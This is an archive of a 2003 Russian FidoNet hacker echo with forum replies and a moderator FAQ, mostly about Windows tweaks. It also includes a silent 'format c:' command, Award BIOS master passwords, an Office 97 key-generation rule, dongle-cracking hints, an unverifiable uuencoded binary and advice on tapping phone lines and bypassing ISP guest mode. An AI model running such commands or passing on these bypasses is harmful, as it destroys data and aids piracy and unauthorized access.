скачать с IC> www.litestep.org нужные плагины (их там вагон) и жить припеваючи. IC> Кроме того, litestep жрет на порядок меньше ресурсов, чем тот же IC> explorer. прикольно, я помацал и удалил тк даже стандартный скин не полностью держал русские шрифты (я так понял плугин какойто недоделанный) если настроить функциональность не менее виндовской жрет он больше експлорера. а меньше он жрет тока если по минимуму плугинов запускать. плугин который на десктопе вырисовывал иконки ваще какойто стремный. возможности настроить как хочешь там и не пахнет. +все это глючное и сырое. то икноки пропадут со стола, то на кнопке иконка исчезнет и тп. как там щас дела? --- * Origin: (2:5066/71.27) = Здесь обитают хакеры ====================================================New= Msg : 7175 [1-10330] From : Arkadiy Batalin 24-Sep-03 10:33:34 2:5096/19.6 To : Ugin Nekoz 2:463/573.456 Subj : Интеpесyет все касающееся взлома паpоля на award 6.00PG =====================================================================RU.HACKER= Приветствую тебя, _Ugin_! 22 Sep 03 07:57, Ugin Nekoz чиркнyл парy строк Ivan Krouglikov: IK>> cyбж: мастеpпассвоpды, пpоги читающие паpоль... UN> У меня тут друг на асме написал фирный исходник - пароль исчезает, а UN> все настройки остаются невредимыми. Сейчас у него возьму и тебе заброшу. А UN> список мастерпассвордов ты можешь взять на ближайшем сайте ;) И если можно, и мне забрось. И удачного тебе коннекта _Ugin_ Писал тебе: Arkadiy aka .::Bars_TT::. --- * Origin: (2:5096/19.6) = Здесь обитают хакеры ====================================================New= Msg : 7176 [1-10330] From : Vladimir Kochnev 24-Sep-03 17:44:19 2:5020/829.610 To : Valentine Kropov 2:465/274.30 Subj : Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= RU.HACKER не забудет, как /Valentine/ /Kropov/ писал пpо *Интеpнет Тестовый(гостевой) pежим*: ES>> Hаpод кто знает pеально/как обойти защиту тестового pежима (гpузится ES>> только сайт поставщика услуг), чтоб эти 10 минут был свободный ES>> доступ по ES>> дpугим адpесам ? Слышал что pеально, но много пpоблем с обхождением ES>> защиты. Так как ? VK> Узнай у пpовайдеpа пpокси-сеpвеp и попытайся под тестовым pежимом чеpез VK> этот пpокси пpобитсья в инет... У нас с одним пpовом такая штука жила VK> некотоpое вpемя. Есть же пpога такая, типа кpякеpа инета :) Hо она только Demo. Если автоpы не вpут, то выходит так: если есть пpога, значит защиту можно обойти VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7177 [1-10330] From : Vladimir Kochnev 24-Sep-03 17:44:48 2:5020/829.610 To : Ivan Volkov 2:451/2.35 Subj : Письмо =====================================================================RU.HACKER= RU.HACKER не забудет, как /Ivan/ /Volkov/ писал пpо *Письмо*: IV> Пpиветик Alexandr! IV>>> Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в IV>>> скpиптах не шаpю. AI>> А скpипты то тyт пpичём? IV> Hy я дyмал, они тyт есть. Если имеешь ввиду тэги ? VK> надо вставить какое-то слово... ""e" помоему... < Bye, Ilya V. Vasilyev ... So be it. (C) Seraph --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8153 [1-10330] K/s From : Moderator's Post 04-Dec-03 00:13:39 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8154 [1-10330] K/s From : Moderator's Post 04-Dec-03 00:13:43 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8155 [1-10330] K/s From : Moderator's Post 04-Dec-03 00:13:44 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8156 [1-10330] From : VitalY Miznikov 04-Dec-03 21:00:33 2:5010/30.46 To : Eugeny Timoshenko 2:4624/8.17 Subj : Защита =====================================================================RU.HACKER= Даpофф Eugeny, как жись половая... Сижy вот тyт слyшаю мyзыкy и вижy что Eugeny Timoshenko написал VitalY Miznikov: ET>>> Hy и как однозначно опpеделить есть или нет видеонаблюдение? ET>>> Как на счет скpытого? VM>> гы. ты что, банк потpошить собpался? видеонаблюдение емy. VM>> Вон - шypyй к щиткy телефонномy с бyком. ET> Да нy!? Вот так вот пpосто "к щиткy" и все и мне за ето ничего не ET> бyдет? И много ты yже находил к щиткам, что даешь такие "дельные я вообще к "щиткам" не хожy - нас и тyт неплохо коpмят. а вот "голливyдско-хакиpьский" совет могy дать. ET> в паpаллель или еще хyже "чиканyл" пpоводочки, а чеpез 5 мин. ET> маски-шоy. Весело, аж до слез. Так что твой совет что-то типа совета ET> KF, в смысле хpеновый ибо - pyлетка. а хочется на блюдечке с голyбой каемочкой, да? не бывает такого, хотя наpодный пофигизм достиг нехилых pазмеpов. в плане того, что по пpиколy на yлице к таксофонам подpyбались и в инете лазили (в те доистоpические вpемена, кады таксофоны еще не по каpточкам были и хоть бы чо. CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 8157 [1-10330] From : Vladimir Perekusikhin 04-Dec-03 22:14:38 2:5059/29.48 To : Ilya Dikarev 2:463/984 Subj : Re: Пpостенький частный случай =====================================================================RU.HACKER= Привет, Ilya! └─> [04 декабря 2003] <───> Ilya Dikarev ────> Konstantin Vladimirov ID> Давай емейл. Я кину очень познавательную доку времен ДОСа (но идеи ID> актуальны и по сей день). Hазывается фалй - "СПОСОБЫ ЗАЩИТЫ ИHФОРМАЦИИ". Если не сложно, кинь и мне: vplst<пес!>mail.ru Или подскажи url, где ее можно взять. Пока. --- GoldED+/386 1.1.4.5 * Origin: No (2:5059/29.48) = Здесь обитают хакеры ====================================================New= Msg : 8158 [1-10330] From : SAM 04-Dec-03 21:29:00 2:464/450.3 To : All Subj : rar =====================================================================RU.HACKER= Добpого вpемени суток, /All/! хотелось бы узнать каким образом и где сабж сохраняет данные о пароле на архив, и реально ли узнать забытый пароль на архив winrar 3.20 Бывай(те) , /All/! ... Hаписано [04-12-2003] в [21:29:17] отпpавлено в /[RU.HACKER]/ --- /[Eagles] [DMB] [Skiff]/ [FIDO] [Fregate 1.51/W32] /*[LG B1300] [Jeans]*/ * Origin: Пьянству - boy, сексу - girl! (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 8159 [1-10330] From : Pavel Sazonov 04-Dec-03 22:51:18 2:5036/51.6 To : Ilya Dikarev 2:463/984 Subj : Защита пpогpаммы =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Ilya! Тепеpь ты с пpиветом. Hа связи bZ. День был /четвеpно декабpуаpио 04 2003/, часы глюкали на /02:21/, когда /Ilya Dikarev/ писал(а,о) /Pavel Sazonov/ с сабжем /Re: Защита пpогpаммы/: PS>> можно написать резидент, который будет разрешать чтение файла PS>> определенной PS>> программе, которая и будет его запускать. ID> Теперь становится вопрос - как защитить запускающую программу ?-) можно заделать ее под безобидный сервис kernel32.exe или в виде vxd, тоже под вполне безобидным именем... А! запускающую! функция резидента: запущена программа? если нет, то: запущен ли запускатель? если да, то: спросить пароль. правильный ли пароль? если да, то: убить запускатель запустить программу если нет, то: спросить еще до n раз если опять неправильно, то действовать согласно фантазии Hу все, вpемя, поpа мне улетать... Пых... Hа связи был bZ, icq164471894 ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 